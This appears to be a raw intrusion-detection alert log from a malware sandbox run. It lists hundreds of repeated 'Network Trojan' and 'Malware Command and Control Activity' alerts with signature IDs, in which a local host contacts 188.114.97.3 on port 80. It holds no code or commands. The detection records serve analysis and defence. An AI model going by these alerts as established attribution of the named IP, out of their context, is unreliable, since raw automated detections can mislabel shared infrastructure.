            2024-09-25T10:19:59.736725+020020254831A Network Trojan was detected188.114.97.380192.168.2.749758TCP
            2024-09-25T10:20:00.565087+020020254831A Network Trojan was detected188.114.97.380192.168.2.749759TCP
            2024-09-25T10:20:01.366740+020020254831A Network Trojan was detected188.114.97.380192.168.2.749760TCP
            2024-09-25T10:20:02.233938+020020254831A Network Trojan was detected188.114.97.380192.168.2.749761TCP
            2024-09-25T10:20:03.093667+020020254831A Network Trojan was detected188.114.97.380192.168.2.749763TCP
            2024-09-25T10:20:03.909832+020020254831A Network Trojan was detected188.114.97.380192.168.2.749764TCP
            2024-09-25T10:20:04.887903+020020254831A Network Trojan was detected188.114.97.380192.168.2.749765TCP
            2024-09-25T10:20:05.714461+020020254831A Network Trojan was detected188.114.97.380192.168.2.749766TCP
            2024-09-25T10:20:06.571760+020020254831A Network Trojan was detected188.114.97.380192.168.2.749767TCP
            2024-09-25T10:20:07.434671+020020254831A Network Trojan was detected188.114.97.380192.168.2.749768TCP
            2024-09-25T10:20:09.283551+020020254831A Network Trojan was detected188.114.97.380192.168.2.749769TCP
            2024-09-25T10:20:10.196689+020020254831A Network Trojan was detected188.114.97.380192.168.2.749770TCP
            2024-09-25T10:20:11.013287+020020254831A Network Trojan was detected188.114.97.380192.168.2.749771TCP
            2024-09-25T10:20:11.817332+020020254831A Network Trojan was detected188.114.97.380192.168.2.749772TCP
            2024-09-25T10:20:12.635415+020020254831A Network Trojan was detected188.114.97.380192.168.2.749773TCP
            2024-09-25T10:20:13.440852+020020254831A Network Trojan was detected188.114.97.380192.168.2.749774TCP
            2024-09-25T10:20:14.241223+020020254831A Network Trojan was detected188.114.97.380192.168.2.749775TCP
            2024-09-25T10:20:15.056810+020020254831A Network Trojan was detected188.114.97.380192.168.2.749776TCP
            2024-09-25T10:20:15.902727+020020254831A Network Trojan was detected188.114.97.380192.168.2.749777TCP
            2024-09-25T10:20:16.729213+020020254831A Network Trojan was detected188.114.97.380192.168.2.749778TCP
            2024-09-25T10:20:17.555476+020020254831A Network Trojan was detected188.114.97.380192.168.2.749779TCP
            2024-09-25T10:20:18.436115+020020254831A Network Trojan was detected188.114.97.380192.168.2.749780TCP
            2024-09-25T10:20:19.242304+020020254831A Network Trojan was detected188.114.97.380192.168.2.749781TCP
            2024-09-25T10:20:20.049175+020020254831A Network Trojan was detected188.114.97.380192.168.2.749782TCP
            2024-09-25T10:20:21.089402+020020254831A Network Trojan was detected188.114.97.380192.168.2.749783TCP
            2024-09-25T10:20:21.901715+020020254831A Network Trojan was detected188.114.97.380192.168.2.749784TCP
            2024-09-25T10:20:22.722686+020020254831A Network Trojan was detected188.114.97.380192.168.2.749785TCP
            2024-09-25T10:20:23.542018+020020254831A Network Trojan was detected188.114.97.380192.168.2.749786TCP
            2024-09-25T10:20:24.402809+020020254831A Network Trojan was detected188.114.97.380192.168.2.749787TCP
            2024-09-25T10:20:25.371419+020020254831A Network Trojan was detected188.114.97.380192.168.2.749788TCP
            2024-09-25T10:20:26.208265+020020254831A Network Trojan was detected188.114.97.380192.168.2.749789TCP
            2024-09-25T10:20:27.030372+020020254831A Network Trojan was detected188.114.97.380192.168.2.749790TCP
            2024-09-25T10:20:27.842255+020020254831A Network Trojan was detected188.114.97.380192.168.2.749791TCP
            2024-09-25T10:20:28.655543+020020254831A Network Trojan was detected188.114.97.380192.168.2.749792TCP
            2024-09-25T10:20:29.647628+020020254831A Network Trojan was detected188.114.97.380192.168.2.749793TCP
            2024-09-25T10:20:30.576547+020020254831A Network Trojan was detected188.114.97.380192.168.2.749794TCP
            2024-09-25T10:20:31.382078+020020254831A Network Trojan was detected188.114.97.380192.168.2.749795TCP
            2024-09-25T10:20:32.195932+020020254831A Network Trojan was detected188.114.97.380192.168.2.749796TCP
            2024-09-25T10:20:33.006817+020020254831A Network Trojan was detected188.114.97.380192.168.2.749797TCP
            2024-09-25T10:20:33.848087+020020254831A Network Trojan was detected188.114.97.380192.168.2.749798TCP
            2024-09-25T10:20:34.683975+020020254831A Network Trojan was detected188.114.97.380192.168.2.749799TCP
            2024-09-25T10:20:35.514687+020020254831A Network Trojan was detected188.114.97.380192.168.2.749800TCP
            2024-09-25T10:20:36.338191+020020254831A Network Trojan was detected188.114.97.380192.168.2.749801TCP
            2024-09-25T10:20:37.196799+020020254831A Network Trojan was detected188.114.97.380192.168.2.749802TCP
            2024-09-25T10:20:38.018123+020020254831A Network Trojan was detected188.114.97.380192.168.2.749803TCP
            2024-09-25T10:20:38.835742+020020254831A Network Trojan was detected188.114.97.380192.168.2.749804TCP
            2024-09-25T10:20:39.661421+020020254831A Network Trojan was detected188.114.97.380192.168.2.749805TCP
            2024-09-25T10:20:40.528482+020020254831A Network Trojan was detected188.114.97.380192.168.2.749806TCP
            2024-09-25T10:20:41.378361+020020254831A Network Trojan was detected188.114.97.380192.168.2.749807TCP
            2024-09-25T10:20:42.253717+020020254831A Network Trojan was detected188.114.97.380192.168.2.749808TCP
            2024-09-25T10:20:43.050099+020020254831A Network Trojan was detected188.114.97.380192.168.2.749809TCP
            2024-09-25T10:20:43.859419+020020254831A Network Trojan was detected188.114.97.380192.168.2.749810TCP
            2024-09-25T10:20:44.689401+020020254831A Network Trojan was detected188.114.97.380192.168.2.749811TCP
            2024-09-25T10:20:45.510355+020020254831A Network Trojan was detected188.114.97.380192.168.2.749812TCP
            2024-09-25T10:20:46.432138+020020254831A Network Trojan was detected188.114.97.380192.168.2.749813TCP
            2024-09-25T10:20:47.227872+020020254831A Network Trojan was detected188.114.97.380192.168.2.749814TCP
            2024-09-25T10:20:48.054731+020020254831A Network Trojan was detected188.114.97.380192.168.2.749815TCP
            2024-09-25T10:20:49.025566+020020254831A Network Trojan was detected188.114.97.380192.168.2.749816TCP
            2024-09-25T10:20:50.108060+020020254831A Network Trojan was detected188.114.97.380192.168.2.749817TCP
            2024-09-25T10:20:50.954575+020020254831A Network Trojan was detected188.114.97.380192.168.2.749818TCP
            2024-09-25T10:20:51.813535+020020254831A Network Trojan was detected188.114.97.380192.168.2.749819TCP
            2024-09-25T10:20:52.625510+020020254831A Network Trojan was detected188.114.97.380192.168.2.749820TCP
            2024-09-25T10:20:53.484717+020020254831A Network Trojan was detected188.114.97.380192.168.2.749821TCP
            2024-09-25T10:20:54.318662+020020254831A Network Trojan was detected188.114.97.380192.168.2.749822TCP
            2024-09-25T10:20:55.126025+020020254831A Network Trojan was detected188.114.97.380192.168.2.749823TCP
            2024-09-25T10:20:55.943963+020020254831A Network Trojan was detected188.114.97.380192.168.2.749824TCP
            2024-09-25T10:20:56.785409+020020254831A Network Trojan was detected188.114.97.380192.168.2.749825TCP
            2024-09-25T10:20:57.621047+020020254831A Network Trojan was detected188.114.97.380192.168.2.749826TCP
            2024-09-25T10:20:58.439188+020020254831A Network Trojan was detected188.114.97.380192.168.2.749827TCP
            2024-09-25T10:20:59.265646+020020254831A Network Trojan was detected188.114.97.380192.168.2.749828TCP
            2024-09-25T10:21:00.492931+020020254831A Network Trojan was detected188.114.97.380192.168.2.749829TCP
            2024-09-25T10:21:01.357871+020020254831A Network Trojan was detected188.114.97.380192.168.2.749830TCP
            2024-09-25T10:21:02.145946+020020254831A Network Trojan was detected188.114.97.380192.168.2.749831TCP
            2024-09-25T10:21:03.204695+020020254831A Network Trojan was detected188.114.97.380192.168.2.749832TCP
            2024-09-25T10:21:04.019903+020020254831A Network Trojan was detected188.114.97.380192.168.2.749833TCP
            2024-09-25T10:21:05.136585+020020254831A Network Trojan was detected188.114.97.380192.168.2.749834TCP
            2024-09-25T10:21:05.954767+020020254831A Network Trojan was detected188.114.97.380192.168.2.749835TCP
            2024-09-25T10:21:06.752043+020020254831A Network Trojan was detected188.114.97.380192.168.2.749836TCP
            2024-09-25T10:21:07.597503+020020254831A Network Trojan was detected188.114.97.380192.168.2.749837TCP
            2024-09-25T10:21:08.550360+020020254831A Network Trojan was detected188.114.97.380192.168.2.749838TCP
            2024-09-25T10:21:10.675340+020020254831A Network Trojan was detected188.114.97.380192.168.2.749839TCP
            2024-09-25T10:21:11.517815+020020254831A Network Trojan was detected188.114.97.380192.168.2.749840TCP
            2024-09-25T10:21:12.361141+020020254831A Network Trojan was detected188.114.97.380192.168.2.749841TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:10.811770+020020243131Malware Command and Control Activity Detected192.168.2.749701188.114.97.380TCP
            2024-09-25T10:19:11.665714+020020243131Malware Command and Control Activity Detected192.168.2.749702188.114.97.380TCP
            2024-09-25T10:19:12.531180+020020243131Malware Command and Control Activity Detected192.168.2.749703188.114.97.380TCP
            2024-09-25T10:19:13.453182+020020243131Malware Command and Control Activity Detected192.168.2.749704188.114.97.380TCP
            2024-09-25T10:19:14.450457+020020243131Malware Command and Control Activity Detected192.168.2.749705188.114.97.380TCP
            2024-09-25T10:19:15.399528+020020243131Malware Command and Control Activity Detected192.168.2.749706188.114.97.380TCP
            2024-09-25T10:19:16.220301+020020243131Malware Command and Control Activity Detected192.168.2.749707188.114.97.380TCP
            2024-09-25T10:19:17.022071+020020243131Malware Command and Control Activity Detected192.168.2.749708188.114.97.380TCP
            2024-09-25T10:19:18.146657+020020243131Malware Command and Control Activity Detected192.168.2.749709188.114.97.380TCP
            2024-09-25T10:19:18.987415+020020243131Malware Command and Control Activity Detected192.168.2.749710188.114.97.380TCP
            2024-09-25T10:19:19.794940+020020243131Malware Command and Control Activity Detected192.168.2.749711188.114.97.380TCP
            2024-09-25T10:19:20.899036+020020243131Malware Command and Control Activity Detected192.168.2.749712188.114.97.380TCP
            2024-09-25T10:19:21.689404+020020243131Malware Command and Control Activity Detected192.168.2.749713188.114.97.380TCP
            2024-09-25T10:19:22.552651+020020243131Malware Command and Control Activity Detected192.168.2.749714188.114.97.380TCP
            2024-09-25T10:19:23.518806+020020243131Malware Command and Control Activity Detected192.168.2.749715188.114.97.380TCP
            2024-09-25T10:19:24.365883+020020243131Malware Command and Control Activity Detected192.168.2.749718188.114.97.380TCP
            2024-09-25T10:19:25.286543+020020243131Malware Command and Control Activity Detected192.168.2.749720188.114.97.380TCP
            2024-09-25T10:19:27.092250+020020243131Malware Command and Control Activity Detected192.168.2.749723188.114.97.380TCP
            2024-09-25T10:19:28.045248+020020243131Malware Command and Control Activity Detected192.168.2.749724188.114.97.380TCP
            2024-09-25T10:19:28.881607+020020243131Malware Command and Control Activity Detected192.168.2.749725188.114.97.380TCP
            2024-09-25T10:19:29.680830+020020243131Malware Command and Control Activity Detected192.168.2.749726188.114.97.380TCP
            2024-09-25T10:19:30.583036+020020243131Malware Command and Control Activity Detected192.168.2.749727188.114.97.380TCP
            2024-09-25T10:19:31.369595+020020243131Malware Command and Control Activity Detected192.168.2.749728188.114.97.380TCP
            2024-09-25T10:19:32.827325+020020243131Malware Command and Control Activity Detected192.168.2.749729188.114.97.380TCP
            2024-09-25T10:19:33.628049+020020243131Malware Command and Control Activity Detected192.168.2.749730188.114.97.380TCP
            2024-09-25T10:19:34.467992+020020243131Malware Command and Control Activity Detected192.168.2.749731188.114.97.380TCP
            2024-09-25T10:19:35.318075+020020243131Malware Command and Control Activity Detected192.168.2.749732188.114.97.380TCP
            2024-09-25T10:19:36.366610+020020243131Malware Command and Control Activity Detected192.168.2.749733188.114.97.380TCP
            2024-09-25T10:19:37.190467+020020243131Malware Command and Control Activity Detected192.168.2.749734188.114.97.380TCP
            2024-09-25T10:19:38.140430+020020243131Malware Command and Control Activity Detected192.168.2.749735188.114.97.380TCP
            2024-09-25T10:19:39.901885+020020243131Malware Command and Control Activity Detected192.168.2.749736188.114.97.380TCP
            2024-09-25T10:19:40.752516+020020243131Malware Command and Control Activity Detected192.168.2.749737188.114.97.380TCP
            2024-09-25T10:19:41.580058+020020243131Malware Command and Control Activity Detected192.168.2.749738188.114.97.380TCP
            2024-09-25T10:19:42.413942+020020243131Malware Command and Control Activity Detected192.168.2.749739188.114.97.380TCP
            2024-09-25T10:19:43.241128+020020243131Malware Command and Control Activity Detected192.168.2.749740188.114.97.380TCP
            2024-09-25T10:19:44.027788+020020243131Malware Command and Control Activity Detected192.168.2.749741188.114.97.380TCP
            2024-09-25T10:19:44.852239+020020243131Malware Command and Control Activity Detected192.168.2.749742188.114.97.380TCP
            2024-09-25T10:19:45.666427+020020243131Malware Command and Control Activity Detected192.168.2.749743188.114.97.380TCP
            2024-09-25T10:19:46.545472+020020243131Malware Command and Control Activity Detected192.168.2.749744188.114.97.380TCP
            2024-09-25T10:19:47.442427+020020243131Malware Command and Control Activity Detected192.168.2.749745188.114.97.380TCP
            2024-09-25T10:19:48.277146+020020243131Malware Command and Control Activity Detected192.168.2.749746188.114.97.380TCP
            2024-09-25T10:19:49.076736+020020243131Malware Command and Control Activity Detected192.168.2.749747188.114.97.380TCP
            2024-09-25T10:19:49.885438+020020243131Malware Command and Control Activity Detected192.168.2.749748188.114.97.380TCP
            2024-09-25T10:19:50.708565+020020243131Malware Command and Control Activity Detected192.168.2.749749188.114.97.380TCP
            2024-09-25T10:19:51.507840+020020243131Malware Command and Control Activity Detected192.168.2.749750188.114.97.380TCP
            2024-09-25T10:19:52.350336+020020243131Malware Command and Control Activity Detected192.168.2.749751188.114.97.380TCP
            2024-09-25T10:19:53.355659+020020243131Malware Command and Control Activity Detected192.168.2.749752188.114.97.380TCP
            2024-09-25T10:19:54.186780+020020243131Malware Command and Control Activity Detected192.168.2.749753188.114.97.380TCP
            2024-09-25T10:19:55.325978+020020243131Malware Command and Control Activity Detected192.168.2.749754188.114.97.380TCP
            2024-09-25T10:19:56.126948+020020243131Malware Command and Control Activity Detected192.168.2.749755188.114.97.380TCP
            2024-09-25T10:19:57.009360+020020243131Malware Command and Control Activity Detected192.168.2.749756188.114.97.380TCP
            2024-09-25T10:19:58.849605+020020243131Malware Command and Control Activity Detected192.168.2.749757188.114.97.380TCP
            2024-09-25T10:19:59.726091+020020243131Malware Command and Control Activity Detected192.168.2.749758188.114.97.380TCP
            2024-09-25T10:20:00.560306+020020243131Malware Command and Control Activity Detected192.168.2.749759188.114.97.380TCP
            2024-09-25T10:20:01.361671+020020243131Malware Command and Control Activity Detected192.168.2.749760188.114.97.380TCP
            2024-09-25T10:20:02.229063+020020243131Malware Command and Control Activity Detected192.168.2.749761188.114.97.380TCP
            2024-09-25T10:20:03.088731+020020243131Malware Command and Control Activity Detected192.168.2.749763188.114.97.380TCP
            2024-09-25T10:20:03.904946+020020243131Malware Command and Control Activity Detected192.168.2.749764188.114.97.380TCP
            2024-09-25T10:20:04.881977+020020243131Malware Command and Control Activity Detected192.168.2.749765188.114.97.380TCP
            2024-09-25T10:20:05.709216+020020243131Malware Command and Control Activity Detected192.168.2.749766188.114.97.380TCP
            2024-09-25T10:20:06.566813+020020243131Malware Command and Control Activity Detected192.168.2.749767188.114.97.380TCP
            2024-09-25T10:20:07.429765+020020243131Malware Command and Control Activity Detected192.168.2.749768188.114.97.380TCP
            2024-09-25T10:20:09.278627+020020243131Malware Command and Control Activity Detected192.168.2.749769188.114.97.380TCP
            2024-09-25T10:20:10.191855+020020243131Malware Command and Control Activity Detected192.168.2.749770188.114.97.380TCP
            2024-09-25T10:20:11.008415+020020243131Malware Command and Control Activity Detected192.168.2.749771188.114.97.380TCP
            2024-09-25T10:20:11.812480+020020243131Malware Command and Control Activity Detected192.168.2.749772188.114.97.380TCP
            2024-09-25T10:20:12.630621+020020243131Malware Command and Control Activity Detected192.168.2.749773188.114.97.380TCP
            2024-09-25T10:20:13.435959+020020243131Malware Command and Control Activity Detected192.168.2.749774188.114.97.380TCP
            2024-09-25T10:20:14.236381+020020243131Malware Command and Control Activity Detected192.168.2.749775188.114.97.380TCP
            2024-09-25T10:20:15.051935+020020243131Malware Command and Control Activity Detected192.168.2.749776188.114.97.380TCP
            2024-09-25T10:20:15.897467+020020243131Malware Command and Control Activity Detected192.168.2.749777188.114.97.380TCP
            2024-09-25T10:20:16.724336+020020243131Malware Command and Control Activity Detected192.168.2.749778188.114.97.380TCP
            2024-09-25T10:20:17.550653+020020243131Malware Command and Control Activity Detected192.168.2.749779188.114.97.380TCP
            2024-09-25T10:20:18.430421+020020243131Malware Command and Control Activity Detected192.168.2.749780188.114.97.380TCP
            2024-09-25T10:20:19.235882+020020243131Malware Command and Control Activity Detected192.168.2.749781188.114.97.380TCP
            2024-09-25T10:20:20.044297+020020243131Malware Command and Control Activity Detected192.168.2.749782188.114.97.380TCP
            2024-09-25T10:20:21.084561+020020243131Malware Command and Control Activity Detected192.168.2.749783188.114.97.380TCP
            2024-09-25T10:20:21.896883+020020243131Malware Command and Control Activity Detected192.168.2.749784188.114.97.380TCP
            2024-09-25T10:20:22.717675+020020243131Malware Command and Control Activity Detected192.168.2.749785188.114.97.380TCP
            2024-09-25T10:20:23.537060+020020243131Malware Command and Control Activity Detected192.168.2.749786188.114.97.380TCP
            2024-09-25T10:20:24.398012+020020243131Malware Command and Control Activity Detected192.168.2.749787188.114.97.380TCP
            2024-09-25T10:20:25.366305+020020243131Malware Command and Control Activity Detected192.168.2.749788188.114.97.380TCP
            2024-09-25T10:20:26.202166+020020243131Malware Command and Control Activity Detected192.168.2.749789188.114.97.380TCP
            2024-09-25T10:20:27.025481+020020243131Malware Command and Control Activity Detected192.168.2.749790188.114.97.380TCP
            2024-09-25T10:20:27.837448+020020243131Malware Command and Control Activity Detected192.168.2.749791188.114.97.380TCP
            2024-09-25T10:20:28.650735+020020243131Malware Command and Control Activity Detected192.168.2.749792188.114.97.380TCP
            2024-09-25T10:20:29.642863+020020243131Malware Command and Control Activity Detected192.168.2.749793188.114.97.380TCP
            2024-09-25T10:20:30.571474+020020243131Malware Command and Control Activity Detected192.168.2.749794188.114.97.380TCP
            2024-09-25T10:20:31.377167+020020243131Malware Command and Control Activity Detected192.168.2.749795188.114.97.380TCP
            2024-09-25T10:20:32.191160+020020243131Malware Command and Control Activity Detected192.168.2.749796188.114.97.380TCP
            2024-09-25T10:20:33.000475+020020243131Malware Command and Control Activity Detected192.168.2.749797188.114.97.380TCP
            2024-09-25T10:20:33.843258+020020243131Malware Command and Control Activity Detected192.168.2.749798188.114.97.380TCP
            2024-09-25T10:20:34.678916+020020243131Malware Command and Control Activity Detected192.168.2.749799188.114.97.380TCP
            2024-09-25T10:20:35.509847+020020243131Malware Command and Control Activity Detected192.168.2.749800188.114.97.380TCP
            2024-09-25T10:20:36.333409+020020243131Malware Command and Control Activity Detected192.168.2.749801188.114.97.380TCP
            2024-09-25T10:20:37.192021+020020243131Malware Command and Control Activity Detected192.168.2.749802188.114.97.380TCP
            2024-09-25T10:20:38.012160+020020243131Malware Command and Control Activity Detected192.168.2.749803188.114.97.380TCP
            2024-09-25T10:20:38.830735+020020243131Malware Command and Control Activity Detected192.168.2.749804188.114.97.380TCP
            2024-09-25T10:20:39.656614+020020243131Malware Command and Control Activity Detected192.168.2.749805188.114.97.380TCP
            2024-09-25T10:20:40.523719+020020243131Malware Command and Control Activity Detected192.168.2.749806188.114.97.380TCP
            2024-09-25T10:20:41.372812+020020243131Malware Command and Control Activity Detected192.168.2.749807188.114.97.380TCP
            2024-09-25T10:20:42.248861+020020243131Malware Command and Control Activity Detected192.168.2.749808188.114.97.380TCP
            2024-09-25T10:20:43.045056+020020243131Malware Command and Control Activity Detected192.168.2.749809188.114.97.380TCP
            2024-09-25T10:20:43.854654+020020243131Malware Command and Control Activity Detected192.168.2.749810188.114.97.380TCP
            2024-09-25T10:20:44.684574+020020243131Malware Command and Control Activity Detected192.168.2.749811188.114.97.380TCP
            2024-09-25T10:20:45.503133+020020243131Malware Command and Control Activity Detected192.168.2.749812188.114.97.380TCP
            2024-09-25T10:20:46.424917+020020243131Malware Command and Control Activity Detected192.168.2.749813188.114.97.380TCP
            2024-09-25T10:20:47.222041+020020243131Malware Command and Control Activity Detected192.168.2.749814188.114.97.380TCP
            2024-09-25T10:20:48.049566+020020243131Malware Command and Control Activity Detected192.168.2.749815188.114.97.380TCP
            2024-09-25T10:20:49.020610+020020243131Malware Command and Control Activity Detected192.168.2.749816188.114.97.380TCP
            2024-09-25T10:20:50.103271+020020243131Malware Command and Control Activity Detected192.168.2.749817188.114.97.380TCP
            2024-09-25T10:20:50.944188+020020243131Malware Command and Control Activity Detected192.168.2.749818188.114.97.380TCP
            2024-09-25T10:20:51.808740+020020243131Malware Command and Control Activity Detected192.168.2.749819188.114.97.380TCP
            2024-09-25T10:20:52.620616+020020243131Malware Command and Control Activity Detected192.168.2.749820188.114.97.380TCP
            2024-09-25T10:20:53.479823+020020243131Malware Command and Control Activity Detected192.168.2.749821188.114.97.380TCP
            2024-09-25T10:20:54.312873+020020243131Malware Command and Control Activity Detected192.168.2.749822188.114.97.380TCP
            2024-09-25T10:20:55.121000+020020243131Malware Command and Control Activity Detected192.168.2.749823188.114.97.380TCP
            2024-09-25T10:20:55.938989+020020243131Malware Command and Control Activity Detected192.168.2.749824188.114.97.380TCP
            2024-09-25T10:20:56.779578+020020243131Malware Command and Control Activity Detected192.168.2.749825188.114.97.380TCP
            2024-09-25T10:20:57.616206+020020243131Malware Command and Control Activity Detected192.168.2.749826188.114.97.380TCP
            2024-09-25T10:20:58.434386+020020243131Malware Command and Control Activity Detected192.168.2.749827188.114.97.380TCP
            2024-09-25T10:20:59.260870+020020243131Malware Command and Control Activity Detected192.168.2.749828188.114.97.380TCP
            2024-09-25T10:21:00.485716+020020243131Malware Command and Control Activity Detected192.168.2.749829188.114.97.380TCP
            2024-09-25T10:21:01.352133+020020243131Malware Command and Control Activity Detected192.168.2.749830188.114.97.380TCP
            2024-09-25T10:21:02.141157+020020243131Malware Command and Control Activity Detected192.168.2.749831188.114.97.380TCP
            2024-09-25T10:21:03.199950+020020243131Malware Command and Control Activity Detected192.168.2.749832188.114.97.380TCP
            2024-09-25T10:21:04.015053+020020243131Malware Command and Control Activity Detected192.168.2.749833188.114.97.380TCP
            2024-09-25T10:21:05.131735+020020243131Malware Command and Control Activity Detected192.168.2.749834188.114.97.380TCP
            2024-09-25T10:21:05.949911+020020243131Malware Command and Control Activity Detected192.168.2.749835188.114.97.380TCP
            2024-09-25T10:21:06.745448+020020243131Malware Command and Control Activity Detected192.168.2.749836188.114.97.380TCP
            2024-09-25T10:21:07.563958+020020243131Malware Command and Control Activity Detected192.168.2.749837188.114.97.380TCP
            2024-09-25T10:21:08.545523+020020243131Malware Command and Control Activity Detected192.168.2.749838188.114.97.380TCP
            2024-09-25T10:21:10.666965+020020243131Malware Command and Control Activity Detected192.168.2.749839188.114.97.380TCP
            2024-09-25T10:21:11.513058+020020243131Malware Command and Control Activity Detected192.168.2.749840188.114.97.380TCP
            2024-09-25T10:21:12.356325+020020243131Malware Command and Control Activity Detected192.168.2.749841188.114.97.380TCP
            2024-09-25T10:21:13.248308+020020243131Malware Command and Control Activity Detected192.168.2.749842188.114.97.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:10.811770+020020243181Malware Command and Control Activity Detected192.168.2.749701188.114.97.380TCP
            2024-09-25T10:19:11.665714+020020243181Malware Command and Control Activity Detected192.168.2.749702188.114.97.380TCP
            2024-09-25T10:19:12.531180+020020243181Malware Command and Control Activity Detected192.168.2.749703188.114.97.380TCP
            2024-09-25T10:19:13.453182+020020243181Malware Command and Control Activity Detected192.168.2.749704188.114.97.380TCP
            2024-09-25T10:19:14.450457+020020243181Malware Command and Control Activity Detected192.168.2.749705188.114.97.380TCP
            2024-09-25T10:19:15.399528+020020243181Malware Command and Control Activity Detected192.168.2.749706188.114.97.380TCP
            2024-09-25T10:19:16.220301+020020243181Malware Command and Control Activity Detected192.168.2.749707188.114.97.380TCP
            2024-09-25T10:19:17.022071+020020243181Malware Command and Control Activity Detected192.168.2.749708188.114.97.380TCP
            2024-09-25T10:19:18.146657+020020243181Malware Command and Control Activity Detected192.168.2.749709188.114.97.380TCP
            2024-09-25T10:19:18.987415+020020243181Malware Command and Control Activity Detected192.168.2.749710188.114.97.380TCP
            2024-09-25T10:19:19.794940+020020243181Malware Command and Control Activity Detected192.168.2.749711188.114.97.380TCP
            2024-09-25T10:19:20.899036+020020243181Malware Command and Control Activity Detected192.168.2.749712188.114.97.380TCP
            2024-09-25T10:19:21.689404+020020243181Malware Command and Control Activity Detected192.168.2.749713188.114.97.380TCP
            2024-09-25T10:19:22.552651+020020243181Malware Command and Control Activity Detected192.168.2.749714188.114.97.380TCP
            2024-09-25T10:19:23.518806+020020243181Malware Command and Control Activity Detected192.168.2.749715188.114.97.380TCP
            2024-09-25T10:19:24.365883+020020243181Malware Command and Control Activity Detected192.168.2.749718188.114.97.380TCP
            2024-09-25T10:19:25.286543+020020243181Malware Command and Control Activity Detected192.168.2.749720188.114.97.380TCP
            2024-09-25T10:19:27.092250+020020243181Malware Command and Control Activity Detected192.168.2.749723188.114.97.380TCP
            2024-09-25T10:19:28.045248+020020243181Malware Command and Control Activity Detected192.168.2.749724188.114.97.380TCP
            2024-09-25T10:19:28.881607+020020243181Malware Command and Control Activity Detected192.168.2.749725188.114.97.380TCP
            2024-09-25T10:19:29.680830+020020243181Malware Command and Control Activity Detected192.168.2.749726188.114.97.380TCP
            2024-09-25T10:19:30.583036+020020243181Malware Command and Control Activity Detected192.168.2.749727188.114.97.380TCP
            2024-09-25T10:19:31.369595+020020243181Malware Command and Control Activity Detected192.168.2.749728188.114.97.380TCP
            2024-09-25T10:19:32.827325+020020243181Malware Command and Control Activity Detected192.168.2.749729188.114.97.380TCP
            2024-09-25T10:19:33.628049+020020243181Malware Command and Control Activity Detected192.168.2.749730188.114.97.380TCP
            2024-09-25T10:19:34.467992+020020243181Malware Command and Control Activity Detected192.168.2.749731188.114.97.380TCP
            2024-09-25T10:19:35.318075+020020243181Malware Command and Control Activity Detected192.168.2.749732188.114.97.380TCP
            2024-09-25T10:19:36.366610+020020243181Malware Command and Control Activity Detected192.168.2.749733188.114.97.380TCP
            2024-09-25T10:19:37.190467+020020243181Malware Command and Control Activity Detected192.168.2.749734188.114.97.380TCP
            2024-09-25T10:19:38.140430+020020243181Malware Command and Control Activity Detected192.168.2.749735188.114.97.380TCP
            2024-09-25T10:19:39.901885+020020243181Malware Command and Control Activity Detected192.168.2.749736188.114.97.380TCP
            2024-09-25T10:19:40.752516+020020243181Malware Command and Control Activity Detected192.168.2.749737188.114.97.380TCP
            2024-09-25T10:19:41.580058+020020243181Malware Command and Control Activity Detected192.168.2.749738188.114.97.380TCP
            2024-09-25T10:19:42.413942+020020243181Malware Command and Control Activity Detected192.168.2.749739188.114.97.380TCP
            2024-09-25T10:19:43.241128+020020243181Malware Command and Control Activity Detected192.168.2.749740188.114.97.380TCP
            2024-09-25T10:19:44.027788+020020243181Malware Command and Control Activity Detected192.168.2.749741188.114.97.380TCP
            2024-09-25T10:19:44.852239+020020243181Malware Command and Control Activity Detected192.168.2.749742188.114.97.380TCP
            2024-09-25T10:19:45.666427+020020243181Malware Command and Control Activity Detected192.168.2.749743188.114.97.380TCP
            2024-09-25T10:19:46.545472+020020243181Malware Command and Control Activity Detected192.168.2.749744188.114.97.380TCP
            2024-09-25T10:19:47.442427+020020243181Malware Command and Control Activity Detected192.168.2.749745188.114.97.380TCP
            2024-09-25T10:19:48.277146+020020243181Malware Command and Control Activity Detected192.168.2.749746188.114.97.380TCP
            2024-09-25T10:19:49.076736+020020243181Malware Command and Control Activity Detected192.168.2.749747188.114.97.380TCP
            2024-09-25T10:19:49.885438+020020243181Malware Command and Control Activity Detected192.168.2.749748188.114.97.380TCP
            2024-09-25T10:19:50.708565+020020243181Malware Command and Control Activity Detected192.168.2.749749188.114.97.380TCP
            2024-09-25T10:19:51.507840+020020243181Malware Command and Control Activity Detected192.168.2.749750188.114.97.380TCP
            2024-09-25T10:19:52.350336+020020243181Malware Command and Control Activity Detected192.168.2.749751188.114.97.380TCP
            2024-09-25T10:19:53.355659+020020243181Malware Command and Control Activity Detected192.168.2.749752188.114.97.380TCP
            2024-09-25T10:19:54.186780+020020243181Malware Command and Control Activity Detected192.168.2.749753188.114.97.380TCP
            2024-09-25T10:19:55.325978+020020243181Malware Command and Control Activity Detected192.168.2.749754188.114.97.380TCP
            2024-09-25T10:19:56.126948+020020243181Malware Command and Control Activity Detected192.168.2.749755188.114.97.380TCP
            2024-09-25T10:19:57.009360+020020243181Malware Command and Control Activity Detected192.168.2.749756188.114.97.380TCP
            2024-09-25T10:19:58.849605+020020243181Malware Command and Control Activity Detected192.168.2.749757188.114.97.380TCP
            2024-09-25T10:19:59.726091+020020243181Malware Command and Control Activity Detected192.168.2.749758188.114.97.380TCP
            2024-09-25T10:20:00.560306+020020243181Malware Command and Control Activity Detected192.168.2.749759188.114.97.380TCP
            2024-09-25T10:20:01.361671+020020243181Malware Command and Control Activity Detected192.168.2.749760188.114.97.380TCP
            2024-09-25T10:20:02.229063+020020243181Malware Command and Control Activity Detected192.168.2.749761188.114.97.380TCP
            2024-09-25T10:20:03.088731+020020243181Malware Command and Control Activity Detected192.168.2.749763188.114.97.380TCP
            2024-09-25T10:20:03.904946+020020243181Malware Command and Control Activity Detected192.168.2.749764188.114.97.380TCP
            2024-09-25T10:20:04.881977+020020243181Malware Command and Control Activity Detected192.168.2.749765188.114.97.380TCP
            2024-09-25T10:20:05.709216+020020243181Malware Command and Control Activity Detected192.168.2.749766188.114.97.380TCP
            2024-09-25T10:20:06.566813+020020243181Malware Command and Control Activity Detected192.168.2.749767188.114.97.380TCP
            2024-09-25T10:20:07.429765+020020243181Malware Command and Control Activity Detected192.168.2.749768188.114.97.380TCP
            2024-09-25T10:20:09.278627+020020243181Malware Command and Control Activity Detected192.168.2.749769188.114.97.380TCP
